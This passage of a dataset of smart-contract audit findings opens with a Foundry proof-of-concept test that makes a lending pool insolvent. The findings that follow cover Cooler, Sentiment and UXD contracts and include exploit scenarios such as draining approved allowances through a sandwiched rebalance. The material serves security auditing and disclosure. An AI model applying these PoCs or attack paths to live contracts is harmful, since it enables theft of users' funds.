liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(\"ERC20_NON_SUBSET_HASH\");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), \"\");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\nчIt's recommended that the price of the assets on auction consider the fenwick(s) being used when determining the price of assets on loan and do not fall below that particular index. With this fix in place, the worst case scenario is that lenders can pruchase these assets for the price they were loaned out for allowing them to recover the loss.чAn increase in borrowers who cant pay their debts back will result in a loss for all lenders.ч```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, \"DAI / WETH Pool Three\");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(\"ERC20_NON_SUBSET_HASH\");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), \"\");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\n -Incorrect MOMP calculation in neutral price calculationчmediumчWhen calculating MOMP to find the neutral price of a borrower, borrower's accrued debt is divided by the total number of loans in the pool, but it's total pool's debt that should be divided. The mistake will result in lower neutral prices and more lost bonds to kickers.\\nAs per the whitepaper:\\nMOMP: is the price at which the amount of deposit above it is equal to the average loan size of the pool. MOMP is short for “Most Optimistic Matching Price”, as it's the price at which a loan of average size would match with the most favorable lenders on the book.\\nI.e. MOMP is calculated on the total number of loans of a pool (so that the average loan size could be found).\\nMOMP calculation is implemented correctly when kicking a debt, however it's implementation in the Loans.update function is not correct:\\n```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n\\nHere, only borrower's debt (borrowerAccruedDebt_) is divided, not the entire debt of the pool.чIssue Incorrect MOMP calculation in neutral price calculation\\nConsider using total pool's debt in the MOMP calculation in `Loans.update`.чThe miscalculation affects only borrower's neutral price calculation. Since MOMP is calculated on a smaller debt (borrower's debt will almost always be smaller than total pool's debt), the value of MOMP will be smaller than expected, and the neutral price will also be smaller (from the whitepaper: \"The NP of a loan is the interest-adjusted MOMP...\"). This will cause kickers to lose their bonds more often than expected, as per the whitepaper:\\nIf the liquidation auction yields a value that is over the “Neutral Price,” NP, the kicker forfeits a portion or all of their bond.ч```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n -Lender force Loan become defaultчhighчin `repay()` directly transfer the debt token to Lender, but did not consider that Lender can not accept the token (in contract blacklist), resulting in `repay()` always revert, and finally the Loan can only expire, Loan be default\\nThe only way for the borrower to get the collateral token back is to repay the amount owed via repay(). Currently in the repay() method transfers the debt token directly to the Lender. This has a problem: if the Lender is blacklisted by the debt token now, the debtToken.transferFrom() method will fail and the repay() method will always fail and finally the Loan will default. Example: Assume collateral token = ETH,debt token = USDC, owner = alice 1.alice call request() to loan 2000 usdc , duration = 1 mon 2.bob call clear(): loanID =1 3.bob transfer loan[1].lender = jack by Cooler.approve/transfer\\nNote: jack has been in USDC's blacklist for some reason before or bob in USDC's blacklist for some reason now, it doesn't need transfer 'lender') 4.Sometime before the expiration date, alice call repay(id=1) , it will always revert, Because usdc.transfer(jack) will revert 5.after 1 mon, loan[1] default, jack call defaulted() get collateral token\\n```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\nчInstead of transferring the debt token directly, put the debt token into the Cooler.sol and set like: withdrawBalance[lender]+=amount, and provide the method withdraw() for lender to get debtToken backчLender forced Loan become default for get collateral token, owner lost collateral tokenч```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\n -`Cooler.roll()` wouldn't work as expected when `newCollateral = 0`.чmediumч`Cooler.roll()` is used to increase the loan duration by transferring the additional collateral.\\nBut there will be some problems when `newCollateral = 0`.\\n```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n\\nIn `roll()`, it transfers the `newCollateral` amount of collateral to the contract.\\nAfter the borrower repaid most of the debts, `loan.amount` might be very small and `newCollateral` for the original interest might be 0 because of the rounding issue.\\nThen as we can see from this one, some tokens might revert for 0 amount and `roll()` wouldn't work as expected.чI think we should handle it differently when `newCollateral = 0`.\\nAccording to impact 2, I think it would be good to revert when `newCollateral = 0`.чThere will be 2 impacts.\\nWhen the borrower tries to extend the loan using `roll()`, it will revert with the weird tokens when `newCollateral = 0`.\\nAfter the borrower noticed he couldn't repay anymore(so the lender will default the loan), the borrower can call `roll()` again when `newCollateral = 0`. In this case, the borrower doesn't lose anything but the lender must wait for `req.duration` again to default the loan.ч```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n -Loan is rollable by defaultчmediumчMaking the loan rollable by default gives an unfair early advantage to the borrowers.\\nWhen clearing a new loan, the flag of `rollable` is set to true by default:\\n```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n\\nThis means a borrower can extend the loan anytime before the expiry:\\n```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n```\\n\\nIf the lenders do not intend to allow rollable loans, they should separately toggle the status to prevent that:\\n```\\n function toggleRoll(uint256 loanID) external returns (bool) {\\n // rest of code\\n loan.rollable = !loan.rollable;\\n // rest of code\\n }\\n```\\n\\nI believe it gives an unfair advantage to the borrower because they can re-roll the loan before the lender's transaction forbids this action.чI believe `rollable` should be set to false by default or at least add an extra function parameter to determine the initial value of this status.чLenders who do not want the loans to be used more than once, have to bundle their transactions. Otherwise, it is possible that someone might roll their loan, especially if the capital requirements are not huge because anyone can roll any loan.ч```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n -Use safeTransfer/safeTransferFrom consistently instead of transfer/transferFromчhighчUse safeTransfer/safeTransferFrom consistently instead of transfer/transferFrom\\n```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\nчConsider using safeTransfer/safeTransferFrom consistently.чIf the token send fails, it will cause a lot of serious problems. For example, in the clear function, if debt token is ZRX, the lender can clear request without providing any debt token.ч```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\n -Fully repaying a loan will result in debt payment being lostчhighчWhen a `loan` is fully repaid the `loan` `storage` is deleted. Since `loan` is a `storage` reference to the `loan`, `loan.lender` will return `address(0)` after the `loan` has been deleted. This will result in the `debt` being transferred to `address(0)` instead of the lender. Some ERC20 tokens will revert when being sent to `address(0)` but a large number will simply be sent there and lost forever.\\n```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n\\nIn `Cooler#repay` the `loan` storage associated with the loanID being repaid is deleted. `loan` is a storage reference so when `loans[loanID]` is deleted so is `loan`. The result is that `loan.lender` is now `address(0)` and the `loan` payment will be sent there instead.чSend collateral/debt then delete:\\n```\\n- if (repaid == loan.amount) delete loans[loanID];\\n+ if (repaid == loan.amount) {\\n+ debt.transferFrom(msg.sender, loan.lender, loan.amount);\\n+ collateral.transfer(owner, loan.collateral);\\n+ delete loans[loanID];\\n+ return;\\n+ }\\n```\\nчLender's funds are sent to `address(0)`ч```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n -No check if Arbitrum L2 sequencer is down in Chainlink feedsчmediumчUsing Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.\\n```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\nчIssue No check if Arbitrum L2 sequencer is down in Chainlink feedsчThe impact depends on the usage of the GLP. If it is used as part of the collateral for lenders:\\nUsers can get better borrows if the price is above the actual price\\nUsers can avoid liquidations if the price is under the actual priceч```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\n -GMX Reward Router's claimForAccount() can be abused to incorrectly add WETH to tokensInчmediumчWhen `claimFees()` is called, the Controller automatically adds WETH to the user's account. However, in the case where no fees have accrued yet, there will not be WETH withdrawn. In this case, the user will have WETH added as an asset in their account, while they won't actually have any WETH holdings.\\nWhen a user calls the GMX Reward Router's `claimFees()` function, the RewardRouterController confirms the validity of this call in the `canCallClaimFees()` function:\\n```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n\\nThis function assumes that any user calling `claimFees()` will always receive `WETH`. However, this is only the case if their stake has been accruing.\\nImagine the following two actions are taken in the same block:\\nDeposit assets into GMX staking\\nCall claimFees()\\nThe result will be that `claimFees()` returns no `WETH`, but `WETH` is added to the account's asset list.\\nThe same is true if a user performs the following three actions:\\nCall claimFees()\\nWithdraw all ETH from the WETH contract\\nCall claimFees() againчThe best way to solve this is actually not at the Controller level. It's to solve the issue of fake assets being added once and not have to worry about it on the Controller level in the future.\\nThis can be accomplished in `AccountManager.sol#_updateTokensIn()`. It should be updated to only add the token to the assets list if it has a positive balance, as follows:\\n```\\nfunction _updateTokensIn(address account, address[] memory tokensIn)\\n internal\\n{\\n uint tokensInLen = tokensIn.length;\\n for(uint i; i < tokensInLen; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false)\\n// Add the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false && IERC20(token).balanceOf(account) > 0)\\n IAccount(account).addAsset(tokensIn[i]);\\n }\\n}\\n```\\n\\nHowever, `_updateTokensIn()` is currently called before the function is executed in `exec()`, so that would need to be changed as well:\\n```\\nfunction exec(address account, address target, uint amt, bytes calldata data) external onlyOwner(account) {\\n bool isAllowed;\\n address[] memory tokensIn;\\n address[] memory tokensOut;\\n (isAllowed, tokensIn, tokensOut) = controller.canCall(target, (amt > 0), data);\\n if (!isAllowed) revert Errors.FunctionCallRestricted();\\n// Remove the line below\\n _updateTokensIn(account, tokensIn);\\n (bool success,) = IAccount(account).exec(target, amt, data);\\n if (!success)\\n revert Errors.AccountInteractionFailure(account, target, amt, data);\\n// Add the line below\\n _updateTokensIn(account, tokensIn);\\n _updateTokensOut(account, tokensOut);\\n if (!riskEngine.isAccountHealthy(account))\\n revert Errors.RiskThresholdBreached();\\n}\\n```\\n\\nWhile this fix does require changing a core contract, it would negate the need to worry about edge cases causing incorrect accounting of tokens on any future integrations, which I think is a worthwhile trade off.\\nThis accuracy is especially important as Sentiment becomes better known and integrated into the Arbitrum ecosystem. While I know that having additional assets doesn't cause internal problems at present, it is hard to predict what issues inaccurate data will cause in the future. Seeing that Plutus is checking Sentiment contracts for their whitelist drove this point home — we need to ensure the data stays accurate, even in edge cases, or else there will be trickle down problems we can't currently predict.чA user can force their account into a state where it has `WETH` on the asset list, but doesn't actually hold any `WETH`.\\nThis specific Impact was judged as Medium for multiple issues in the previous contest:ч```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n -PerpDespository#reblance and rebalanceLite can be called to drain funds from anyone who has approved PerpDepositoryчhighчPerpDespository#reblance and rebalanceLite allows anyone to specify the account that pays the quote token. These functions allow a malicious user to abuse any allowance provided to PerpDirectory. rebalance is the worst of the two because the malicious user could sandwich attack the rebalance to steal all the funds and force the unsuspecting user to pay the `shortfall`.\\n```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n\\n`rebalance` is an unpermissioned function that allows anyone to call and `rebalance` the PNL of the depository. It allows the caller to specify the an account that passes directly through to `_rebalanceNegativePnlWithSwap`\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n // @audit this uses user supplied swap parameters which can be malicious\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96,\\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n int256 shortFall = int256(\\n quoteAmount.fromDecimalToDecimal(18, ERC20(quoteToken).decimals())\\n ) - int256(quoteAmountOut);\\n if (shortFall > 0) {\\n // @audit shortfall is taken from account specified by user\\n IERC20(quoteToken).transferFrom(\\n account,\\n address(this),\\n uint256(shortFall)\\n );\\n } else if (shortFall < 0) {\\n // rest of code\\n }\\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\n`_rebalanceNegativePnlWithSwap` uses both user specified swap parameters and takes the shortfall from the account specified by the user. This is where the function can be abused to steal funds from any user that sets an allowance for this contract. A malicious user can sandwich attack the swap and specify malicious swap parameters to allow them to steal the entire rebalance. This creates a large shortfall which will be taken from the account that they specify, effectively stealing the funds from the user.\\nExample: Any `account` that gives the depository allowance can be stolen from. Imagine the following scenario. The multisig is going to rebalance the contract for 15000 USDC worth of ETH and based on current market conditions they are estimating that there will be a 1000 USDC shortfall because of the difference between the perpetual and spot prices (divergences between spot and perpetual price are common in trending markets). They first approve the depository for 1000 USDC. A malicious user sees this approval and immediately submits a transaction of their own. They request to rebalance only 1000 USDC worth of ETH and sandwich attack the swap to steal the rebalance. They specify the multisig as `account` and force it to pay the 1000 USDC shortfall and burn their entire allowance, stealing the USDC.чPerpDespository#reblance and rebalanceLite should use msg.sender instead of account:\\n```\\n function rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n- address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n- account \\n+ msg.sender\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n```\\nчAnyone that gives the depository allowance can easily have their entire allowance stolenч```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n -USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralizedчhighчPerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.чAllow all USDC now deposited into the insurance fund to be redeemed 1:1чUDX will become undercollateralized and the ecosystem will spiral out of controlч```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n -PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extractedчhighчPerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.чI recommend pulling pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can 